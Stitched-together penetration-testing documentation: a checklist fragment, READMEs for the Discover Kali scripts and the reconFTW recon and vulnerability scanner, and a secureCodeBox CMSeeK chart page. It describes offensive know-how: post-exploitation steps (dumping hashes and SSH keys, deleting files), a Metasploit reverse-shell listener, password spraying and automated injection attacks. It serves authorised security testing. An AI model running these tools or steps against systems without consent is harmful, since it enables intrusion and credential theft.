☐ windows-privesc-check2.exe
```
Priv Escalation ☐ acesss internal services \(portfwd\) ☐ add account
Windows ☐ List of exploits
Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit
Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete files
## Log Book
|
For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
# Licence
This project is licensed under the ```BSD 3-clause “New” or “Revised” License```. For more information please see the licence file
### Download, setup & usage
* git clone git://github.com/leebaird/discover.git /opt/discover/
* All scripts must be ran from this location.
* cd /opt/discover/
* ./setup.sh
* ./discover.sh
```
RECON
1. Domain
2. Person
3. Parse salesforce
SCANNING
4. Generate target list
5. CIDR
6. List
7. IP or domain
WEB
8. Open multiple tabs in Iceweasel
9. Nikto
10. SSL
MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit
```
## RECON
### Domain
```
RECON
1. Passive
2. Active
3. Previous menu
```
* Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple webistes.
* Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.
### Person
```
RECON
First name:
Last name:
```
* Combines info from multiple websites.
### Parse salesforce
```
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.
Enter the location of your list:
```
* Gather names and positions into a clean list.
## SCANNING
### Generate target list
```
SCANNING
1. Local area network
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu
```
* Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.
### CIDR, List, IP or domain
```
Type of scan:
1. External
2. Internal
3. Previous menu
```
* External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
* Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
* Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
* Matching nmap scripts are used for additional enumeration.
* Matching Metasploit auxiliary modules are also leveraged.
## WEB
### Open multiple tabs in Iceweasel
```
Open multiple tabs in Iceweasel with:
1. List
2. Directories from a domain's robot.txt.
3. Previous menu
```
* Use a list containing IPs and/or URLs.
* Use wget to pull a domain's robot.txt file, then open all of the directories.
### Nikto
```
Run multiple instances of Nikto in parallel.
1. List of IPs.
2. List of IP:port.
3. Previous menu
```
### SSL
```
Check for SSL certificate issues.
Enter the location of your list:
```
* Use sslscan and sslyze to check for SSL/TLS certificate issues.
## MISC
### Crack WiFi
* Crack wireless networks.
### Parse XML
```
Parse XML to CSV.
1. Burp (Base64)
2. Nessus
3. Nexpose
4. Nmap
5. Qualys
6. Previous menu
```
### Start a Metasploit listener
* Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.
### Update
* Use to update Kali Linux, Discover scripts, various tools and the locate database.
|
<h1 align="center">
<br>
<a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a>
<br>
reconFTW
<br>
</h1>
<p align="center">
<a href="https://github.com/six2dez/reconftw/releases/tag/v2.2.1.1">
<img src="https://img.shields.io/badge/release-v2.2.1.1-green">
</a>
</a>
<a href="https://www.gnu.org/licenses/gpl-3.0.en.html">
<img src="https://img.shields.io/badge/license-GPL3-_red.svg">
</a>
<a href="https://twitter.com/Six2dez1">
<img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue">
</a>
<a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed">
<img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg">
</a>
<a href="https://github.com/six2dez/reconftw/wiki">
<img src="https://img.shields.io/badge/doc-wiki-blue.svg">
</a>
<a href="https://t.me/joinchat/H5bAaw3YbzzmI5co">
<img src="https://img.shields.io/badge/[email protected]">
</a>
<a href="https://hub.docker.com/r/six2dez/reconftw">
<img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw">
</a>
</p>
<h3 align="center">Summary</h3>
**ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition.
It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target.
So, what are you waiting for Go! Go! Go! :boom:
📔 Table of Contents
-----------------
- [💿 Installation:](#-installation)
- [a) In your PC/VPS/VM](#a-in-your-pcvpsvm)
- [b) Docker container 🐳 (2 options)](#b-docker-container--2-options)
- [1) From DockerHub](#1-from-dockerhub)
- [2) From repository](#2-from-repository)
- [You can also choose to configure a locale at build time](#you-can-also-choose-to-configure-a-locale-at-build-time)
- [⚙️ Config file:](#️-config-file)
- [Usage:](#usage)
- [Example Usage:](#example-usage)
- [Axiom Support: :cloud:](#axiom-support-cloud)
- [BBRF Support: :computer:](#bbrf-support-computer)
- [Sample video:](#sample-video)
- [:fire: Features :fire:](#fire-features-fire)
- [Osint](#osint)
- [Subdomains](#subdomains)
- [Hosts](#hosts)
- [Webs](#webs)
- [Extras](#extras)
- [Mindmap/Workflow](#mindmapworkflow)
- [Data Keep](#data-keep)
- [Main commands:](#main-commands)
- [How to contribute:](#how-to-contribute)
- [Need help? :information_source:](#need-help-information_source)
- [Support this project](#support-this-project)
- [Buymeacoffee](#buymeacoffee)
- [DigitalOcean referral link](#digitalocean-referral-link)
- [GitHub sponsorship](#github-sponsorship)
- [Sponsors ❤️](#sponsors-️)
- [Thanks :pray:](#thanks-pray)
- [Disclaimer](#disclaimer)
---
# 💿 Installation:
## a) In your PC/VPS/VM
> You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book:
- Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**)
```bash
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
```
## b) Docker container 🐳 (2 options)
- Docker parameters usage
``` bash
-d -> Detached
-v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -> Share CFG with the Docker
-v $PWD/Recon/:/root/Tools/reconftw/Recon/ -> Share output folder with the Host
--name reconftwSCAN -> Docker name
--rm -> Automatically remove the container when it exits
'-d target.com -r' -> reconftw parameters
```
### 1) From [DockerHub](https://hub.docker.com/r/six2dez/reconftw)
```bash
docker pull six2dez/reconftw:main
# Download and configure CFG file
wget https://raw.githubusercontent.com/six2dez/reconftw/main/reconftw.cfg
mkdir Recon
docker run -d -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm six2dez/reconftw:main -d target.com -r
```
### 2) From repository
```bash
git clone https://github.com/six2dez/reconftw
cd reconftw
docker buildx build -t reconftw Docker/.
# Running from reconftw root folder, configure values properly for your needs
docker run -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm reconftw -d target.com -r
```
#### You can also choose to configure a locale at build time
```
docker buildx build --build-arg LANG=es_ES.UTF-8 --build-arg LANGUAGE=es_ES -t reconftw Docker/.
```
# ⚙️ Config file:
> A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book:
- Through ```reconftw.cfg``` file the whole execution of the tool can be controlled.
- Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more.
<details>
<br><br>
<summary> :point_right: Click here to view default config file :point_left: </summary>
```yaml
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
profile_shell=".$(basename $(echo $SHELL))rc"
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags)
generate_resolvers=false
proxy_url="http://127.0.0.1:8080/"
#dir_output=/custom/output/path
# Golang Vars (Comment or change on your own)
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH
# Tools config files
#NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define
#SUBFINDER_CONFIG=~/.config/subfinder/config.yaml # No need to define
AMASS_CONFIG=~/.config/amass/config.ini
GITHUB_TOKENS=${tools}/.github_tokens
#CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path
# APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line
#SHODAN_API_KEY="XXXXXXXXXXXXX"
#WHOISXML_API="XXXXXXXXXX"
#XSS_SERVER="XXXXXXXXXXXXXXXXX"
#COLLAB_SERVER="XXXXXXXXXXXXXXXXX"
#findomain_virustotal_token="XXXXXXXXXXXXXXXXX"
#findomain_spyse_token="XXXXXXXXXXXXXXXXX"
#findomain_securitytrails_token="XXXXXXXXXXXXXXXXX"
#findomain_fb_token="XXXXXXXXXXXXXXXXX"
#slack_channel="XXXXXXXX"
#slack_auth="xoXX-XXX-XXX-XXX"
# File descriptors
DEBUG_STD="&>/dev/null"
DEBUG_ERROR="2>/dev/null"
# Osint
OSINT=true
GOOGLE_DORKS=true
GITHUB_DORKS=true
METADATA=true
EMAILS=true
DOMAIN_INFO=true
IP_INFO=true
METAFINDER_LIMIT=20 # Max 250
# Subdomains
SUBDOMAINS_GENERAL=true
SUBPASSIVE=true
SUBCRT=true
SUBANALYTICS=true
SUBBRUTE=true
SUBSCRAPING=true
SUBPERMUTE=true
SUBTAKEOVER=true
SUBRECURSIVE=true
SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries
SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve
ZONETRANSFER=true
S3BUCKETS=true
REVERSE_IP=false
TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,990,992,993,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,6697,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003"
# Web detection
WEBPROBESIMPLE=true
WEBPROBEFULL=true
WEBSCREENSHOT=true
VIRTUALHOSTS=true
UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672"
# You can change to aquatone if gowitness fails, comment the one you don't want
AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot
# Host
FAVICON=true
PORTSCANNER=true
PORTSCAN_PASSIVE=true
PORTSCAN_ACTIVE=true
CLOUD_IP=true
# Web analysis
WAF_DETECTION=true
NUCLEICHECK=true
NUCLEI_SEVERITY="info,low,medium,high,critical"
URL_CHECK=true
URL_GF=true
URL_EXT=true
JSCHECKS=true
FUZZ=true
CMS_SCANNER=true
WORDLIST=true
ROBOTSWORDLIST=true
PASSWORD_DICT=true
PASSWORD_MIN_LENGTH=5
PASSWORD_MAX_LENGTH=14
# Vulns
VULNS_GENERAL=false
XSS=true
CORS=true
TEST_SSL=true
OPEN_REDIRECT=true
SSRF_CHECKS=true
CRLF_CHECKS=true
LFI=true
SSTI=true
SQLI=true
BROKENLINKS=true
SPRAY=true
COMM_INJ=true
PROTO_POLLUTION=true
# Extra features
NOTIFICATION=false # Notification for every function
SOFT_NOTIFICATION=false # Only for start/end
DEEP=false
DEEP_LIMIT=500
DEEP_LIMIT2=1500
DIFF=false
REMOVETMP=false
REMOVELOG=false
PROXY=false
SENDZIPNOTIFY=false
PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans
FFUF_FLAGS="-mc all -fc 404 -ac -sf -s"
# HTTP options
HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
# Threads
FFUF_THREADS=40
HTTPX_THREADS=50
HTTPX_UNCOMMONPORTS_THREADS=100
GOSPIDER_THREADS=20
GITDORKER_THREADS=5
BRUTESPRAY_THREADS=20
BRUTESPRAY_CONCURRENCE=10
GAUPLUS_THREADS=10
DNSTAKE_THREADS=100
DALFOX_THREADS=200
PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited
PUREDNS_TRUSTED_LIMIT=400
PUREDNS_WILDCARDTEST_LIMIT=30
PUREDNS_WILDCARDBATCH_LIMIT=1500000
WEBSCREENSHOT_THREADS=200
GOWITNESS_THREADS=8
RESOLVE_DOMAINS_THREADS=150
PPFUZZ_THREADS=30
DNSVALIDATOR_THREADS=200
INTERLACE_THREADS=10
CERO_THREADS=1000
# Timeouts
CMSSCAN_TIMEOUT=3600
FFUF_MAXTIME=900 # Seconds
HTTPX_TIMEOUT=10 # Seconds
HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds
# lists
fuzz_wordlist=${tools}/fuzz_wordlist.txt
lfi_wordlist=${tools}/lfi_wordlist.txt
ssti_wordlist=${tools}/ssti_wordlist.txt
subs_wordlist=${tools}/subdomains.txt
subs_wordlist_big=${tools}/subdomains_big.txt
resolvers=${tools}/resolvers.txt
resolvers_trusted=${tools}/resolvers_trusted.txt
# Axiom Fleet
# Will not start a new fleet if one exist w/ same name and size (or larger)
# AXIOM=false Uncomment only to overwrite command line flags
AXIOM_FLEET_LAUNCH=false
AXIOM_FLEET_NAME="reconFTW"
AXIOM_FLEET_COUNT=5
AXIOM_FLEET_REGIONS="eu-central"
AXIOM_FLEET_SHUTDOWN=true
# This is a script on your reconftw host that might prep things your way...
#AXIOM_POST_START="~/Tools/axiom_config.sh"
AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments
#AXIOM_EXTRA_ARGS="--rm-logs" # Example
# BBRF
BBRF_CONNECTION=false
BBRF_SERVER=https://demo.bbrf.me/bbrf
BBRF_USERNAME="user"
BBRF_PASSWORD="password"
# TERM COLORS
bred='\033[1;31m'
bblue='\033[1;34m'
bgreen='\033[1;32m'
byellow='\033[1;33m'
red='\033[0;31m'
blue='\033[0;34m'
green='\033[0;32m'
yellow='\033[0;33m'
reset='\033[0m'
```
</details>
# Usage:
> Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book:
**TARGET OPTIONS**
| Flag | Description |
|------|-------------|
| -d | Single Target domain *(example.com)* |
| -l | List of targets *(one per line)* |
| -m | Multiple domain target *(companyName)* |
| -x | Exclude subdomains list *(Out Of Scope)* |
| -i | Include subdomains list *(In Scope)* |
**MODE OPTIONS**
| Flag | Description |
|------|-------------|
| -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) |
| -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers |
| -p | Passive - Perform only passive steps |
| -a | All - Perform whole recon and all active attacks |
| -w | Web - Perform only vulnerability checks/attacks on particular target |
| -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) |
| -c | Custom - Launches specific function against target |
| -h | Help - Show this help menu |
**GENERAL OPTIONS**
| Flag | Description |
|------|-------------|
| --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) |
| -f | Custom config file path |
| -o | Output directory |
| -v | Axiom distributed VPS |
# Example Usage:
**To perform a full recon on single target**
```bash
./reconftw.sh -d target.com -r
```
**To perform a full recon on a list of targets**
```bash
./reconftw.sh -l sites.txt -r -o /output/directory/
```
**Perform full recon with more time intense tasks** *(VPS intended only)*
```bash
./reconftw.sh -d target.com -r --deep -o /output/directory/
```
**Perform recon in a multi domain target**
```bash
./reconftw.sh -m company -l domains_list.txt -r
```
**Perform recon with axiom integration**
```bash
./reconftw.sh -d target.com -r -v
```
**Perform all steps (whole recon + all attacks) a.k.a. YOLO mode**
```bash
./reconftw.sh -d target.com -a
```
**Show help section**
```bash
./reconftw.sh -h
```
# Axiom Support: :cloud:
![](https://i.ibb.co/Jzrgkqt/axiom-readme.png)
> Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version)
* As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time.
* During the configuration of axiom you need to select `reconftw` as provisoner.
* You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file.
# BBRF Support: :computer:
* To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf.
* During the execution of the scans the results will be added dinamically when each step ends.
* Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI.
# Sample video:
![Video](images/reconFTW.gif)
# :fire: Features :fire:
## Osint
- Domain information parser ([domainbigdata](https://domainbigdata.com/))
- Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester), [emailfinder](https://github.com/Josue87/EmailFinder))
- Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail))
- Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder))
- Google Dorks ([degoogle_hunter](https://github.com/six2dez/degoogle_hunter))
- Github Dorks ([GitDorker](https://github.com/obheda12/GitDorker))
## Subdomains
- Passive ([amass](https://github.com/OWASP/Amass), [waybackurls](https://github.com/tomnomnom/waybackurls), [github-subdomains](https://github.com/gwen001/github-subdomains), [gau](https://github.com/lc/gau))
- Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr))
- Bruteforce ([puredns](https://github.com/d3mondev/puredns))
- Permutations ([Gotator](https://github.com/Josue87/gotator))
- JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider))
- DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx))
- Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships))
- Recursive search.
- Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei))
- DNS takeover ([dnstake](https://github.com/pwnesia/dnstake))
- DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig))
## Hosts
- IP and subdomains WAF checker ([cf-check](https://github.com/dwisiswant0/cf-check) and [wafw00f](https://github.com/EnableSecurity/wafw00f))
- Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [nrich](https://gitlab.com/shodan-public/nrich))
- Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb))
- Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray))
- Cloud providers check ([clouddetect](https://github.com/99designs/clouddetect))
## Webs
- Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap))
- Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness))
- Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git))
- Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gauplus](https://github.com/bp0lr/gauplus), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA))
- URLPatterns Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns))
- XSS ([dalfox](https://github.com/hahwul/dalfox))
- Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer))
- SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf))
- CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz))
- Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up))
- Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [LinkFinder](https://github.com/GerbenJavado/LinkFinder), [getjswords](https://github.com/m4ll0k/BBTz))
- Fuzzing ([ffuf](https://github.com/ffuf/ffuf))
- Cors ([Corsy](https://github.com/s0md3v/Corsy))
- LFI Checks ([ffuf](https://github.com/ffuf/ffuf))
- SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap))
- SSTI ([ffuf](https://github.com/ffuf/ffuf))
- CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK))
- SSL tests ([testssl](https://github.com/drwetter/testssl.sh))
- Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider))
- S3 bucket finder ([S3Scanner](https://github.com/sa7mon/S3Scanner))
- Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz))
- URL sorting by extension
- Wordlist generation
- Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor))
## Extras
- Multithread ([Interlace](https://github.com/codingo/Interlace))
- Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator))
- Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration
- Allows IP/CIDR as target
- Resume the scan from last performed step
- Custom output folder option
- All in one installer/updater script compatible with most distros
- Diff support for continuous running (cron mode)
- Support for targets with multiple domains
- Raspberry Pi/ARM support
- 6 modes (recon, passive, subdomains, web, osint and all)
- Out of Scope Support
- Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support
# Mindmap/Workflow
![Mindmap](images/mindmapv2.png)
## Data Keep
Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data.
* Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload)
* Clone your project: `git clone https://gitlab.com/example/reconftw-data`
* Get inside the cloned repository: `cd reconftw-data`
* Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"`
* Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example)
* Update upstream's repo: `git fetch upstream`
* Rebase current branch with the official one: `git rebase upstream/main master`
### Main commands:
* Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master`
* Update tool anytime: `git fetch upstream && git rebase upstream/main master`
## How to contribute:
If you want to contribute to this project you can do it in multiple ways:
- Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request.
- Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script.
## Need help? :information_source:
- Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section.
- Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions.
- Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co)
## Support this project
### Buymeacoffee
[<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez)
### DigitalOcean referral link
<a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a>
### GitHub sponsorship
[Sponsor](https://github.com/sponsors/six2dez)
# Sponsors ❤️
**This section shows the current financial sponsors of this project**
[<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian)
[<img src="https://pbs.twimg.com/profile_images/1296513249702285312/fpHFDhyc_400x400.jpg" width="100" height=auto>](https://github.com/reconmap)
[<img src="https://pbs.twimg.com/profile_images/1221701173864017922/Wg_Q7HoD_400x400.jpg" width="100" height=auto>](https://github.com/r1p)
# Thanks :pray:
* Thank you for lending a helping hand towards the development of the project!
- [Spyse](https://spyse.com/)
- [Networksdb](https://networksdb.io/)
- [Intelx](https://intelx.io/)
- [BinaryEdge](https://www.binaryedge.io/)
- [Censys](https://censys.io/)
- [CIRCL](https://www.circl.lu/)
- [Whoxy](https://www.whoxy.com/)
# Disclaimer
Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly.
The material contained in this repository is licensed under GNU GPLv3.
|
---
title: "CMSeeK"
category: "scanner"
type: "CMS"
state: "released"
appVersion: "v.1.1.3"
usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities"
---
<!--
SPDX-FileCopyrightText: the secureCodeBox authors
SPDX-License-Identifier: Apache-2.0
-->
<!--
.: IMPORTANT! :.
--------------------------
This file is generated automatically with `helm-docs` based on the following template files:
- ./.helm-docs/templates.gotmpl (general template data for all charts)
- ./chart-folder/.helm-docs.gotmpl (chart specific template data)
Please be aware of that and apply your changes only within those template files instead of this file.
Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml`
--------------------------
-->
<p align="center">
<a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a>
<a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Lab Project" src="https://img.shields.io/badge/OWASP-Lab%20Project-yellow"/></a>
<a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a>
<a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a>
</p>
## What is CMSeeK?
CMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and its installed extensions.
Only the Joomla CMS is supported by secureCodeBox. CMSeeK has a database with known vulnerabilities.
To learn more about the CMSeeK scanner itself, visit the CMSeeK GitHub repository [here](https://github.com/Tuhinshubhra/CMSeeK).
## Deployment
The cmseek chart can be deployed via helm:
```bash
# Install HelmChart (use -n to configure another namespace)
helm upgrade --install cmseek secureCodeBox/cmseek
```
## Scanner Configuration
The CMSeeK targets are specified with the `-u` parameter. The target should be a URL.
Additional CMSeeK scan features can be configured via the parameter attribute.
Some useful example parameters listed below:
- `-u URL, --url URL` : Target Url.
- `--follow-redirect` : Follows all/any redirect(s).
- `--no-redirect` : skips all redirects and tests the input target(s)
- `-r, --random-agent`: Use a random user agent.
- `--googlebot`: Use Google bot user agent.
- `--user-agent USER_AGENT`: Specify a custom user agent
## Requirements
Kubernetes: `>=v1.11.0-0`
## Values
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| cascadingRules.enabled | bool | `false` | Enables or disables the installation of the default cascading rules for this scanner |
| imagePullSecrets | list | `[]` | Define imagePullSecrets when a private registry is used (see: https://kubernetes.io/docs/tasks/configure-pod-container/pull-image-private-registry/) |
| parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| parser.image.repository | string | `"docker.io/securecodebox/parser-cmseek"` | Parser image repository |
| parser.image.tag | string | defaults to the charts version | Parser image tag |
| parser.resources | object | { requests: { cpu: "200m", memory: "100Mi" }, limits: { cpu: "400m", memory: "200Mi" } } | Optional resources lets you control resource limits and requests for the parser container. See https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/ |
| parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. |
| parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
| scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) |
